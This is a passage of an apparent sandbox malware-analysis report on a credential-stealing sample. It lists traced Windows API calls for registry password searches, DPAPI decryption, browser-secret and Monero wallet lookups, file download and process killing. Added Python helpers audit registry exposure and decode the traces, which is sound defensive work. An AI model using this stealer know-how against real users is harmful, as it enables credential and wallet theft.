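                  if NAME_NEEDLE in name and looks_like_dpapi_blob(data))


# Constructed sample of what RegEnumValueA could return for one key.
SAMPLE_VALUES = {
    "AccountPassword": DPAPI_BLOB_MAGIC + b"\x00" * 32,  # protected blob: harvestable
    "LegacyPassword": b"not-a-dpapi-blob",               # name matches, data does not
    "accountpassword": DPAPI_BLOB_MAGIC + b"\x00" * 32,  # case mismatch: StrStrA skips it
    "Email": b"user@example.invalid",                    # name does not match
}


def enumerate_key_values(subkey: str) -> dict:
    """Walk one HKCU key with winreg (Windows only; returns {} elsewhere).
    'subkey' is supplied by the caller, e.g. an application's profile key."""
    if sys.platform != "win32":
        return {}
    import winreg
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_READ) as key:
        i = 0
        while True:
            try:
                name, data, _type = winreg.EnumValue(key, i)
            except OSError:        # no more values
                break
            if isinstance(data, bytes):   # REG_BINARY is where blobs live
                out[name] = data
            i += 1
    return out


def audit_key(subkey: str) -> list:
    """Convenience wrapper: values under HKCU\\<subkey> a stealer would take."""
    return select_dpapi_values(enumerate_key_values(subkey))
```

The point of the check is scoping, not decryption: because CryptUnprotectData with the default user scope works for any process running as that user, every value this audit lists is already readable by malware in the user's session, and the remediation is to move the secret out of the registry (or into a Credential Manager entry the application owns) rather than to try to harden the DPAPI blob.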
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF134
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF162
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF176
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF185
                                  • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1A3
                                  • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1D1
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1E4
                                  • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1F6
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF202
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF24F
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                  • String ID: ERROR
                                  • API String ID: 2137491262-2861137601
                                  • Opcode ID: 0ccb198f16557ad731565c158123a5b1a920426cce087d492a64593b97b820d3
                                  • Instruction ID: eeaea77859745d1e0d77873dd87a69061edbc88c2fdd969200f011df2ab6df6e
                                  • Opcode Fuzzy Hash: 0ccb198f16557ad731565c158123a5b1a920426cce087d492a64593b97b820d3
                                  • Instruction Fuzzy Hash: 4051BE35A102899FCB21AF79CC49ABE7BA8FF85710F054564FA49DB222DB70DC428791
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(010CD738,00B19BD8,0000FFFF), ref: 008EA086
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008EA0B3
                                  • lstrlenA.KERNEL32(00B19BD8), ref: 008EA0C0
                                  • lstrcpy.KERNEL32(00000000,00B19BD8), ref: 008EA0EA
                                  • lstrlenA.KERNEL32(00915204), ref: 008EA0F5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA112
                                  • lstrcatA.KERNEL32(00000000,00915204), ref: 008EA11E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA144
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008EA14F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA174
                                  • SetEnvironmentVariableA.KERNEL32(010CD738,00000000), ref: 008EA18F
                                  • LoadLibraryA.KERNEL32(010D0AD0), ref: 008EA1A3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: a3273726c6a914127deaf9bd78df3fb213a825522ea82374cead74b4ba295570
                                  • Instruction ID: 1211a363534f8593f23fdd25d93abc767daa5756835588dabefbb3f5425416e0
                                  • Opcode Fuzzy Hash: a3273726c6a914127deaf9bd78df3fb213a825522ea82374cead74b4ba295570
                                  • Instruction Fuzzy Hash: 9E91D535600A80DFD7249FBADC44AA637B5FB46B04F818528F505D7361EFB1ED818B92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008EBD0F
                                  • lstrlenA.KERNEL32(00000000), ref: 008EBD42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBD6C
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008EBD74
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBD9C
                                  • lstrlenA.KERNEL32(0091508C), ref: 008EBE13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 4c8f0d060030977f2c6b74f16ecad6092dbccfdeda1b71ad1aacdb4b41be40cb
                                  • Instruction ID: a3c604eead77efa309a0489e2ad1266e97a7b35ad5bad74904234da8a9340881
                                  • Opcode Fuzzy Hash: 4c8f0d060030977f2c6b74f16ecad6092dbccfdeda1b71ad1aacdb4b41be40cb
                                  • Instruction Fuzzy Hash: F4A18030A012859FCB24EF6ADD49A9FBBB4FF46304F548069E409DB262DB71DC52CB91
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F8263
                                  • lstrlenA.KERNEL32(00000000), ref: 008F829C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F82D3
                                  • lstrlenA.KERNEL32(00000000), ref: 008F82F0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8327
                                  • lstrlenA.KERNEL32(00000000), ref: 008F8344
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F837B
                                  • lstrlenA.KERNEL32(00000000), ref: 008F8398
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F83C7
                                  • lstrlenA.KERNEL32(00000000), ref: 008F83E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8410
                                  • strtok_s.MSVCRT ref: 008F842A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$strtok_s
                                  • String ID:
                                  • API String ID: 2211830134-0
                                  • Opcode ID: 61217740d8f483c0e1cc30f0b65226990c3bbd6f3151f6f85dbcd68ebcb9b7fb
                                  • Instruction ID: 0c2987d22da63240c06a29f9eca87f6c29fe0a6e1ddb9efdec38291f707067b4
                                  • Opcode Fuzzy Hash: 61217740d8f483c0e1cc30f0b65226990c3bbd6f3151f6f85dbcd68ebcb9b7fb
                                  • Instruction Fuzzy Hash: 83513971900617EBDB14AF79D848AAABBA8FF04310F108524ED06EB245DF30ED61CBE0
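The "APIs" records on this page all use one line format: an API name and its module, the argument list as the sandbox observed it (hex words, "?" for values it could not resolve, or literal strings), and the call-site address after "ref:". Reading the registry, WinINet and DPAPI calls above means translating constants such as 80000001, 00020019 or 00000001 by hand each time. The helper below is an added analysis aid, not part of Joe Sandbox or of the sample: it parses these lines, decodes the Win32 constants that occur in the records on this page (anything it does not know stays as printed), and pulls out the literal-string arguments, which is where C2 URLs and search keys such as "Password" surface. The sample lines fed to it are copied from the records above.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode the Win32 constants that
appear in them. Added analysis helper; the sample lines are from this report."""
import re

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HEXWORD = re.compile(r"^-?[0-9A-F]{8}$")   # the sandbox prints 32-bit words, sometimes signed

HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
ENUM = {   # (api, argument index) -> names for exact values
    ("RegOpenKeyExA", 0): HKEY, ("RegEnumValueA", 0): HKEY,
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"},
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                           3: "INTERNET_OPEN_TYPE_PROXY"},
    ("CreateFileA", 4): {2: "CREATE_ALWAYS", 3: "OPEN_EXISTING"},
}
FLAGS = {  # (api, argument index) -> names for individual bits
    ("InternetOpenUrlA", 4): {0x80000000: "INTERNET_FLAG_RELOAD",
                              0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                              0x00800000: "INTERNET_FLAG_SECURE"},
    ("CryptUnprotectData", 5): {0x1: "CRYPTPROTECT_UI_FORBIDDEN"},
    ("LocalAlloc", 0): {0x40: "LMEM_ZEROINIT", 0x2: "LMEM_MOVEABLE"},
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
}


def decode_arg(api: str, idx: int, raw: str) -> str:
    """Return a symbolic name for a known constant, else the raw token."""
    if not HEXWORD.match(raw):
        return raw                          # '?' or a literal string: keep as-is
    value = int(raw, 16) & 0xFFFFFFFF       # normalise signed output to 32-bit
    names = ENUM.get((api, idx), {})
    if value in names:
        return names[value]
    bits = FLAGS.get((api, idx))
    if bits:
        found = [name for bit, name in bits.items() if value & bit]
        rest = value & ~sum(bits)           # bits with no name in the table
        if rest:
            found.append(f"0x{rest:08X}")
        return "|".join(found) if found else raw
    return raw


def parse_api_line(line: str):
    """One trace line -> dict, or None if the line is not an API record."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m["args"].split(",") if m["args"] else []
    return {
        "api": m["api"], "module": m["module"], "ref": m["ref"], "parent": m["parent"],
        "args": [decode_arg(m["api"], i, a) for i, a in enumerate(args)],
        "strings": [a for a in args if a != "?" and not HEXWORD.match(a)],
    }


def parse_record(text: str) -> list:
    """All API records in a block of report text, in order."""
    return [r for r in (parse_api_line(l) for l in text.splitlines()) if r]


# Lines copied from the records above.
SAMPLE_RECORD = """
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7745
• StrStrA.SHLWAPI(?,Password), ref: 008E77F8
  • Part of subcall function 008E7690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E76CD
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E912C
• strlen.MSVCRT ref: 008E9155
"""
```

Running parse_record over a whole record gives a call list in which the registry open reads as HKEY_CURRENT_USER / KEY_READ and the DPAPI call as CRYPTPROTECT_UI_FORBIDDEN (the sample suppresses any DPAPI prompt), while the "strings" field of each entry collects the report's IOC-bearing literals for export.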
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6A3F
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E6A6C
                                  • StrCmpCA.SHLWAPI(?,010CD6E8), ref: 008E6A8A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008E6AAA
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008E6AC8
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6AE1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008E6B06
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6B30
                                  • CloseHandle.KERNEL32(00000000), ref: 008E6B50
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6B57
                                  • InternetCloseHandle.WININET(?), ref: 008E6B61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 82bfd2224a31389ba1ac50aaaf2333501e19005cd6a7e964c530ef727796db4a
                                  • Instruction ID: 84586076f56e2583c8b0296a1fd1248a030e54cf47bc9442c712f9bf3e4f31c7
                                  • Opcode Fuzzy Hash: 82bfd2224a31389ba1ac50aaaf2333501e19005cd6a7e964c530ef727796db4a
                                  • Instruction Fuzzy Hash: C4419071A40255ABDB20DF65DC89FEE77B8FB44740F508464FA05E7180EF70AE418BA4
                                  APIs
                                    • Part of subcall function 008E7710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7745
                                    • Part of subcall function 008E7710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E778A
                                    • Part of subcall function 008E7710: strlen.MSVCRT ref: 008E77BE
                                    • Part of subcall function 008E7710: StrStrA.SHLWAPI(?,Password), ref: 008E77F8
                                    • Part of subcall function 008E7710: strcpy_s.MSVCRT ref: 008E7821
                                    • Part of subcall function 008E7710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E782C
                                    • Part of subcall function 008E7710: HeapFree.KERNEL32(00000000), ref: 008E7833
                                    • Part of subcall function 008E7710: strlen.MSVCRT ref: 008E7840
                                  • lstrcatA.KERNEL32(00000000,0091508C), ref: 008E79D0
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E79FD
                                  • lstrcatA.KERNEL32(00000000, : ), ref: 008E7A0F
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E7A30
                                  • wsprintfA.USER32 ref: 008E7A50
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E7A79
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008E7A87
                                  • lstrcatA.KERNEL32(00000000,0091508C), ref: 008E7AA0
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                  • String ID: :
                                  • API String ID: 2460923012-3653984579
                                  • Opcode ID: 44704b0974c1dfe3952237ea6f9db651ad47a4603b178d48c1e84d9c9acb9e9d
                                  • Instruction ID: 9c076f9971ab6e66dfc9dd64e313ad35002e6cdcd8467aa2a7ca4722b7ef8262
                                  • Opcode Fuzzy Hash: 44704b0974c1dfe3952237ea6f9db651ad47a4603b178d48c1e84d9c9acb9e9d
                                  • Instruction Fuzzy Hash: DB317576A04298EFCB10DBA9DC44DEFBB79FB89714F658529E50AD3200DF70AA41C790
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F8105
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0090093B), ref: 008F814B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F817A
                                  • StrCmpCA.SHLWAPI(00000000,009151F4,?,?,?,?,?,0090093B), ref: 008F8192
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0090093B), ref: 008F81D0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F81FF
                                  • strtok_s.MSVCRT ref: 008F820F
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenstrtok_s
                                  • String ID: fplugins
                                  • API String ID: 3280532728-38756186
                                  • Opcode ID: a15a173cdf3535585c30a90689e3c6ca8e9ba81371e49b840409ea5990037004
                                  • Instruction ID: 4a521c59cce4bb138f6d869237bd709f369478ac24bfd6152f0b5c20dca00265
                                  • Opcode Fuzzy Hash: a15a173cdf3535585c30a90689e3c6ca8e9ba81371e49b840409ea5990037004
                                  • Instruction Fuzzy Hash: 50417B75A0020AEFCB21DF78D948BAABBB8FF44700F118119E959D7244EF34E981CB90
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 008E9E64
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 008E9EA2
                                  • memset.MSVCRT ref: 008E9ECF
                                  • LocalAlloc.KERNEL32(00000040), ref: 008E9F07
                                    • Part of subcall function 00907210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090722E
                                  • lstrcpy.KERNEL32(00000000,00915200), ref: 008EA012
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocalmemset
                                  • String ID: @$v10$v20
                                  • API String ID: 3420379846-278772428
                                  • Opcode ID: 7c738111478b917c8716728451f9065b185eb39fbe3503af6903f6f023707fd1
                                  • Instruction ID: bb042877c84d61143b4819b174c65b384bc8f24a776e995bee68ee905c375374
                                  • Opcode Fuzzy Hash: 7c738111478b917c8716728451f9065b185eb39fbe3503af6903f6f023707fd1
                                  • Instruction Fuzzy Hash: 3351B431A00289ABDB10EFAACC45BDE7BA8FF42314F054425F959EB252DBB0ED4587D1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1015
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E101C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1039
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1053
                                  • RegCloseKey.ADVAPI32(?), ref: 008E105D
                                  Strings
                                  • SOFTWARE\monero-project\monero-core, xrefs: 008E102F
                                  • wallet_path, xrefs: 008E104D
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3466090806-4244082812
                                  • Opcode ID: 228372d5a65e615134154039c25abbf4d8cfd345560fd596ec461e94df0dce32
                                  • Instruction ID: ef8592f86f7e24456024dec34d9a4b9566374b6b0adac07c1f03dc0dfe18ac2f
                                  • Opcode Fuzzy Hash: 228372d5a65e615134154039c25abbf4d8cfd345560fd596ec461e94df0dce32
                                  • Instruction Fuzzy Hash: 92F03079B40349BBD7109BA1AC4DFEB7B7CEB44715F104154FE09E3281DAB05A4487A1
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904779
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00904789
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0090479B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009047BC
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009047CB
                                  • CloseHandle.KERNEL32(00000000), ref: 009047D2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 009047E0
                                  • CloseHandle.KERNEL32(00000000), ref: 009047EB
                                  Yara matches
                                  Similarity
